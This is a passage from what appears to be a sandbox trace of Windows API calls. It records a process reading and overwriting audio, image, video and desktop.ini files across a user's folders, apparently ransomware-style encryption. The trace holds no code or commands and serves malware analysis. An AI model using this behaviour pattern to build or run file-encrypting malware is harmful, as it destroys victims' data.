dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.780] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.780] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4883 [0177.780] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.780] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.780] ReleaseMutex (hMutex=0x168) returned 1 [0177.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0bReyfxBjmL.mp3", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0177.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0bReyfxBjmL.mp3", cchWideChar=15, lpMultiByteStr=0x1f7360c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0bReyfxBjmL.mp3", lpUsedDefaultChar=0x0) returned 15 [0177.781] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.782] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3883 [0177.782] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.782] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3883 [0177.782] WriteFile (in: hFile=0x1f0, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.783] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0177.783] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0177.783] CloseHandle (hObject=0x1f0) returned 1 [0177.783] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\f73fI\\nFGizAvd4c.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\f73fi\\nfgizavd4c.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.784] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.784] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x106be [0177.784] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.784] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.784] ReleaseMutex (hMutex=0x168) returned 1 [0177.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nFGizAvd4c.mp3", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nFGizAvd4c.mp3", cchWideChar=14, lpMultiByteStr=0x1f7356c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nFGizAvd4c.mp3", lpUsedDefaultChar=0x0) returned 14 [0177.784] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.786] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xf6be [0177.786] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.786] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xf6be [0177.786] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.787] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0177.787] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.787] CloseHandle (hObject=0x1f0) returned 1 [0177.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\XBXuL7EWRu5aAzPmdq7F\\rca5aO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\xbxul7ewru5aazpmdq7f\\rca5ao.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.788] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.788] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x13139 [0177.788] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.788] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.788] ReleaseMutex (hMutex=0x168) returned 1 [0177.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rca5aO.wav", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rca5aO.wav", cchWideChar=10, lpMultiByteStr=0x1f7360c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rca5aO.wav", lpUsedDefaultChar=0x0) returned 10 [0177.789] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.790] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x12139 [0177.790] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.790] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x12139 [0177.790] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.791] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0177.791] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.791] CloseHandle (hObject=0x1f0) returned 1 [0177.792] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0CT3D.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\0ct3d.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.792] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.792] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x15520 [0177.792] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.793] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.793] ReleaseMutex (hMutex=0x168) returned 1 [0177.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0CT3D.png", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0CT3D.png", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0CT3D.png", lpUsedDefaultChar=0x0) returned 9 [0177.793] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.794] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x14520 [0177.794] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.795] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x14520 [0177.795] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.795] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0177.795] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.795] CloseHandle (hObject=0x1f0) returned 1 [0177.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fFQRpDCXsB\\Ky--QtMU3mL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ffqrpdcxsb\\ky--qtmu3ml.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.796] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.796] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1022d [0177.796] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.796] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.796] ReleaseMutex (hMutex=0x168) returned 1 [0177.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ky--QtMU3mL.png", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0177.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ky--QtMU3mL.png", cchWideChar=15, lpMultiByteStr=0x1f7360c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ky--QtMU3mL.png", lpUsedDefaultChar=0x0) returned 15 [0177.797] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.798] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xf22d [0177.798] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.798] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xf22d [0177.799] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.799] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0177.799] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.799] CloseHandle (hObject=0x1f0) returned 1 [0177.800] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.800] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.800] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x20c [0177.800] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.800] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.800] ReleaseMutex (hMutex=0x168) returned 1 [0177.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0177.801] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x20c, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x311f2bc*=0x20c, lpOverlapped=0x0) returned 1 [0177.802] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.802] WriteFile (in: hFile=0x1f0, lpBuffer=0x2848ae8*, nNumberOfBytesToWrite=0x794, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848ae8*, lpNumberOfBytesWritten=0x311f2d0*=0x794, lpOverlapped=0x0) returned 1 [0177.802] CloseHandle (hObject=0x1f0) returned 1 [0177.802] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\EoH7mBquEvOKApaV8\\FHnriB3AfRs-bjT5tWzg\\bG3GjkrnEynbd.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\eoh7mbquevokapav8\\fhnrib3afrs-bjt5twzg\\bg3gjkrneynbd.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.803] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.803] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x15a6b [0177.803] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.803] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.804] ReleaseMutex (hMutex=0x168) returned 1 [0177.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bG3GjkrnEynbd.mp4", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0177.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bG3GjkrnEynbd.mp4", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bG3GjkrnEynbd.mp4", lpUsedDefaultChar=0x0) returned 17 [0177.804] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.805] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x14a6b [0177.805] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.806] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x14a6b [0177.806] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.806] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0177.806] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.806] CloseHandle (hObject=0x1f0) returned 1 [0177.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\_9xD9fCUPs.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\_9xd9fcups.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.808] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.808] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa7a6 [0177.808] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.808] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.808] ReleaseMutex (hMutex=0x168) returned 1 [0177.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_9xD9fCUPs.mp4", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_9xD9fCUPs.mp4", cchWideChar=14, lpMultiByteStr=0x1f7360c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_9xD9fCUPs.mp4", lpUsedDefaultChar=0x0) returned 14 [0177.808] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.809] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x97a6 [0177.809] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.810] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x97a6 [0177.810] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.810] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0177.810] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.810] CloseHandle (hObject=0x1f0) returned 1 [0177.811] CreateFileW 